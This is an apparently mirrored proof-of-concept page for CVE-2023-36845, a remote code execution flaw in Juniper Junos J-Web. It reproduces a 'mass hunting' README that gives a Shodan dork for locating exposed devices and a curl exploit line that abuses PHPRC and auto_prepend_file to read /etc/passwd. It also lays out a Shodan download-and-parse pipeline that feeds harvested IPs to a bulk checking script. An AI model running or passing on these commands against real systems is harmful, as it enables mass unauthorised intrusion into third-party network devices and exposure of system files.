Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-36845 PoC — Juniper Networks Junos OS EX 安全漏洞

Source
Associated Vulnerability
Title:Juniper Networks Junos OS EX 安全漏洞 (CVE-2023-36845)
Description:Juniper Networks Junos OS EX是美国瞻博网络(Juniper Networks)公司的一套专用于该公司的硬件设备的网络操作系统。该操作系统提供了安全编程接口和Junos SDK。 Juniper Networks Junos OS EX存在安全漏洞,该漏洞源于J-Web模块存在PHP外部变量修改漏洞。
Description
Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.
Readme
# Juniper-CVE-2023-36845-Mass-Hunting
Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.

## How to find:

Shodan dork: http.favicon.hash:2141724739

use with relevant other dorks such as ssl certs, org name, etc for a more targetted search.


## Exploitation for a single host:

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’

## Automation: 
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #download from shodan

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt
![IMAGE](imageedit_1_8650806956.jpg)
File Snapshot

[4.0K] /data/pocs/334b283944e49c4d868c4a00bcd3dca34cbef154 ├── [105K] imageedit_1_8650806956.jpg ├── [1.4K] Juniper-RCE-Check.sh ├── [6.9K] LICENSE └── [ 974] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.